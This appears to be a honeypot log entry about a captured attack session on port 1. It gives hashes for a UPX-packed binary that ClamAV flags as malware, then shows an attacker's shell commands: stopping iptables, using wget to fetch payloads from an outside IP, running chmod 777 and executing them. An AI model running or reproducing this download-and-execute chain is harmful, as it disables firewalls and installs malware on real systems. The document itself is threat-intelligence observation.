Port 1

20160917-044900-8028.log

qqq1 is a UPX packed binary (SHA256 sum bbb69a39f801b86b59bead6dac6b3ebd308ebf5f8c6a7a84165af79024ab6acf.

The unpacked binary (SHA256 sum f93d4307b351c356492c9bfb693c513e7f33d51fcf421cd180af786d47f78d0c) contains phrases like I'm a teapot, a whole lot of functions and some references to code.google.com/p/goprotobuf/ and others.

Clam identified it as Unix.Malware.Agent-1689599

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

admin@svr02:~# service iptables stop
bash: service: command not found
admin@svr02:~# wget uggc://115.239.248.35:1/oooo
Sorry, SSL not supported in this release
admin@svr02:~# chmod 777 oooo
chmod: cannot access oooo: No such file or directory
admin@svr02:~# ./oooo &
bash: ./oooo: command not found
admin@svr02:~# wget http://115.239.248.35:1/qqq1
Sorry, SSL not supported in this release
admin@svr02:~# chmod 777 qqq1
chmod: cannot access qqq1: No such file or directory
admin@svr02:~# ./qqq1 &
bash: ./qqq1: command not found
admin@svr02:~# 						

Toggle Menu